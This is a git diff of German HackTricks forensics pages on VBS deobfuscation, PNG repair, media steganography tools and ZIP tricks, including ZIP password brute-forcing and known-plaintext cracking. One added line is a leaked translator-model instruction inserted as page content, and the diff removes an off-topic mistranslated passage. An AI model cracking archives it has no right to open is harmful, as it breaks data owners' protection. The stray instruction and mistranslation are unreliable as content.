+{% endhint %} +``` diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index c66d6f9cd..c2c59d766 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} Hier finden Sie interessante Tricks für bestimmte Dateitypen und/oder Software: @@ -37,16 +38,17 @@ Hier finden Sie interessante Tricks für bestimmte Dateitypen und/oder Software: +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index ad9985d40..9b5967578 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} Einige Dinge, die nützlich sein könnten, um eine bösartige VBS-Datei zu debuggen/deobfuskieren: @@ -24,40 +25,12 @@ Wscript.Echo "Like this?" ' this is a comment ``` ## Test + +Das folgende ist Inhalt aus einem Hacking-Buch über Hacking-Techniken. Der folgende Inhalt stammt aus der Datei forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md. Übersetze den relevanten englischen Text ins Deutsche und gib die Übersetzung zurück, wobei die gleiche Markdown- und HTML-Syntax beibehalten wird. Nichts anderes übersetzen oder hinzufügen. ```bash cscript.exe file.vbs ``` ## Daten in eine Datei schreiben - -To write data to a file in Python, you can use the `write()` method of a file object. The `write()` method allows you to write a string of data to the file. Here's an example: - -```python -# Öffne die Datei im Schreibmodus -datei = open("datei.txt", "w") - -# Schreibe Daten in die Datei -datei.write("Hallo, Welt!") - -# Schließe die Datei -datei.close() -``` - -In diesem Beispiel wird die Datei "datei.txt" im Schreibmodus geöffnet. Dann wird der Text "Hallo, Welt!" in die Datei geschrieben. Schließlich wird die Datei geschlossen, um sicherzustellen, dass alle Änderungen gespeichert werden. - -Es ist wichtig zu beachten, dass der Schreibmodus (`"w"`) die Datei überschreibt, falls sie bereits existiert. Wenn du den Inhalt der Datei beibehalten möchtest und neue Daten hinzufügen möchtest, kannst du den Anfügemodus (`"a"`) verwenden: - -```python -# Öffne die Datei im Anfügemodus -datei = open("datei.txt", "a") - -# Schreibe Daten in die Datei -datei.write("Neue Daten") - -# Schließe die Datei -datei.close() -``` - -Mit dem Anfügemodus werden die neuen Daten am Ende der Datei hinzugefügt, ohne den vorhandenen Inhalt zu überschreiben. ```js Function writeBinary(strBinary, strPath) @@ -82,16 +55,17 @@ End With End Function ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 676ca7e69..eca97ba34 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,35 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -**PNG-Dateien** werden in **CTF-Herausforderungen** aufgrund ihrer **verlustfreien Komprimierung** hoch geschätzt, was sie ideal für das Einbetten versteckter Daten macht. Tools wie **Wireshark** ermöglichen die Analyse von PNG-Dateien, indem sie ihre Daten innerhalb von Netzwerkpaketen zerlegen und eingebettete Informationen oder Anomalien aufdecken. +**PNG-Dateien** werden in **CTF-Herausforderungen** aufgrund ihrer **verlustfreien Kompression** hoch geschätzt, was sie ideal für das Einbetten versteckter Daten macht. Tools wie **Wireshark** ermöglichen die Analyse von PNG-Dateien, indem sie ihre Daten innerhalb von Netzwerkpaketen zerlegen und eingebettete Informationen oder Anomalien aufdecken. -Zur Überprüfung der Integrität von PNG-Dateien und zur Reparatur von Korruption ist **pngcheck** ein wichtiges Tool, das eine Befehlszeilenfunktionalität zum Validieren und Diagnostizieren von PNG-Dateien bietet ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wenn Dateien über einfache Reparaturen hinausgehen, bieten Online-Dienste wie [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) eine webbasierte Lösung zum **Reparieren von beschädigten PNGs**, um bei der Wiederherstellung wichtiger Daten für CTF-Teilnehmer zu helfen. +Zur Überprüfung der Integrität von PNG-Dateien und zur Reparatur von Beschädigungen ist **pngcheck** ein entscheidendes Tool, das eine Befehlszeilenfunktionalität zum Validieren und Diagnostizieren von PNG-Dateien bietet ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wenn Dateien über einfache Reparaturen hinausgehen, bieten Online-Dienste wie [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) eine webbasierte Lösung zum **Reparieren von beschädigten PNGs**, was dazu beiträgt, wichtige Daten für CTF-Teilnehmer wiederherzustellen. Diese Strategien unterstreichen die Bedeutung eines umfassenden Ansatzes in CTFs, der eine Kombination aus analytischen Tools und Reparaturtechniken nutzt, um versteckte oder verlorene Daten aufzudecken und wiederherzustellen. +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index cbe54a10b..3be390fea 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,41 +1,27 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} -**Audio- und Videodateimanipulation** ist ein fester Bestandteil von **CTF-Forensik-Herausforderungen**, bei denen **Steganografie** und Metadatenanalyse eingesetzt werden, um geheime Nachrichten zu verbergen oder aufzudecken. Tools wie **[mediainfo](https://mediaarea.net/en/MediaInfo)** und **`exiftool`** sind unerlässlich, um Dateimetadaten zu inspizieren und Inhaltsarten zu identifizieren. +**Audio- und Videodateimanipulation** ist ein Grundpfeiler in **CTF-Forensik-Herausforderungen**, die **Steganographie** und Metadatenanalyse nutzen, um geheime Nachrichten zu verbergen oder aufzudecken. Tools wie **[mediainfo](https://mediaarea.net/en/MediaInfo)** und **`exiftool`** sind unerlässlich für die Inspektion von Dateimetadaten und die Identifizierung von Inhaltstypen. -Für Audio-Herausforderungen ist **[Audacity](http://www.audacityteam.org/)** ein herausragendes Tool zum Anzeigen von Wellenformen und Analysieren von Spektrogrammen, das zum Aufdecken von in Audio codierten Texten unerlässlich ist. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** wird für detaillierte Spektrogrammanalysen sehr empfohlen. **Audacity** ermöglicht die Manipulation von Audio, wie das Verlangsamen oder Umkehren von Tracks, um versteckte Nachrichten zu erkennen. **[Sox](http://sox.sourceforge.net/)**, ein Befehlszeilen-Dienstprogramm, eignet sich hervorragend zum Konvertieren und Bearbeiten von Audiodateien. +Für Audio-Herausforderungen sticht **[Audacity](http://www.audacityteam.org/)** als erstklassiges Tool zur Anzeige von Wellenformen und Analyse von Spektrogrammen hervor, das für die Entschlüsselung von in Audio codierten Texten unerlässlich ist. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** wird für eine detaillierte Spektrogrammanalyse sehr empfohlen. **Audacity** ermöglicht die Audiomanipulation wie das Verlangsamen oder Umkehren von Tracks, um versteckte Nachrichten zu erkennen. **[Sox](http://sox.sourceforge.net/)**, ein Befehlszeilen-Dienstprogramm, eignet sich hervorragend zum Konvertieren und Bearbeiten von Audiodateien. -Die Manipulation der **Least Significant Bits (LSB)** ist eine gängige Technik in der Audio- und Video-Steganografie, bei der die festen Chunks von Mediendateien genutzt werden, um Daten diskret einzubetten. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** ist nützlich zum Decodieren von als **DTMF-Töne** oder **Morsecode** versteckten Nachrichten. +Die Manipulation der **Least Significant Bits (LSB)** ist eine gängige Technik in der Audio- und Video-Steganographie, die die festen Chunks von Mediendateien ausnutzt, um Daten unauffällig einzubetten. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** ist nützlich zum Decodieren von als **DTMF-Tönen** oder **Morsecode** versteckten Nachrichten. -Video-Herausforderungen beinhalten oft Containerformate, die Audio- und Videostreams bündeln. **[FFmpeg](http://ffmpeg.org/)** ist das Standardwerkzeug zur Analyse und Manipulation dieser Formate und kann Inhalte demultiplexen und wiedergeben. Für Entwickler integriert **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** die Fähigkeiten von FFmpeg in Python für fortgeschrittene, skriptgesteuerte Interaktionen. +Video-Herausforderungen beinhalten oft Containerformate, die Audio- und Videostreams bündeln. **[FFmpeg](http://ffmpeg.org/)** ist das Standardwerkzeug zur Analyse und Manipulation dieser Formate, das in der Lage ist, Inhalte zu demultiplexen und wiederzugeben. Für Entwickler integriert **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** die Fähigkeiten von FFmpeg in Python für fortgeschrittene skriptfähige Interaktionen. -Diese Auswahl an Tools unterstreicht die Vielseitigkeit, die bei CTF-Herausforderungen erforderlich ist, bei denen die Teilnehmer ein breites Spektrum an Analyse- und Manipulationstechniken einsetzen müssen, um versteckte Daten in Audio- und Videodateien aufzudecken. +Dieses Arsenal an Tools unterstreicht die Vielseitigkeit, die in CTF-Herausforderungen erforderlich ist, bei denen die Teilnehmer eine breite Palette von Analyse- und Manipulationstechniken einsetzen müssen, um versteckte Daten in Audio- und Videodateien aufzudecken. ## Referenzen * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - - -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index c1034f81f..a599850fc 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,44 +1,46 @@ # ZIP-Tricks +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -**Befehlszeilentools** zur Verwaltung von **ZIP-Dateien** sind unerlässlich, um ZIP-Dateien zu diagnostizieren, zu reparieren und zu knacken. Hier sind einige wichtige Dienstprogramme: +**Befehlszeilentools** zur Verwaltung von **Zip-Dateien** sind unerlässlich für die Diagnose, Reparatur und das Knacken von Zip-Dateien. Hier sind einige wichtige Dienstprogramme: -- **`unzip`**: Zeigt an, warum eine ZIP-Datei nicht dekomprimiert werden kann. -- **`zipdetails -v`**: Bietet eine detaillierte Analyse der Felder des ZIP-Dateiformats. -- **`zipinfo`**: Listet den Inhalt einer ZIP-Datei auf, ohne sie zu extrahieren. -- **`zip -F input.zip --out output.zip`** und **`zip -FF input.zip --out output.zip`**: Versuchen, beschädigte ZIP-Dateien zu reparieren. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Ein Tool zum Brute-Force-Knacken von ZIP-Passwörtern, das für Passwörter bis zu etwa 7 Zeichen effektiv ist. +- **`unzip`**: Zeigt an, warum eine Zip-Datei möglicherweise nicht dekomprimiert werden kann. +- **`zipdetails -v`**: Bietet eine detaillierte Analyse der Felder des Zip-Dateiformats. +- **`zipinfo`**: Listet den Inhalt einer Zip-Datei auf, ohne sie zu extrahieren. +- **`zip -F input.zip --out output.zip`** und **`zip -FF input.zip --out output.zip`**: Versuchen, beschädigte Zip-Dateien zu reparieren. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Ein Tool zum Brute-Force-Knacken von Zip-Passwörtern, effektiv für Passwörter bis zu etwa 7 Zeichen. -Die [Spezifikation des ZIP-Dateiformats](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) enthält umfassende Details zur Struktur und den Standards von ZIP-Dateien. +Die [Spezifikation des Zip-Dateiformats](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bietet umfassende Details zur Struktur und den Standards von Zip-Dateien. -Es ist wichtig zu beachten, dass passwortgeschützte ZIP-Dateien **Dateinamen oder Dateigrößen nicht verschlüsseln**, eine Sicherheitslücke, die nicht bei RAR- oder 7z-Dateien gemeinsam ist, die diese Informationen verschlüsseln. Darüber hinaus sind ZIP-Dateien, die mit der älteren Methode ZipCrypto verschlüsselt sind, anfällig für einen **Klartextangriff**, wenn eine unverschlüsselte Kopie einer komprimierten Datei verfügbar ist. Dieser Angriff nutzt den bekannten Inhalt, um das Passwort der ZIP-Datei zu knacken, eine Schwachstelle, die in [HackThis's Artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) detailliert beschrieben und in [diesem wissenschaftlichen Artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) weiter erläutert wird. ZIP-Dateien, die jedoch mit **AES-256**-Verschlüsselung gesichert sind, sind immun gegen diesen Klartextangriff, was die Bedeutung der Auswahl sicherer Verschlüsselungsmethoden für sensible Daten zeigt. +Es ist wichtig zu beachten, dass passwortgeschützte Zip-Dateien **Dateinamen oder Dateigrößen nicht 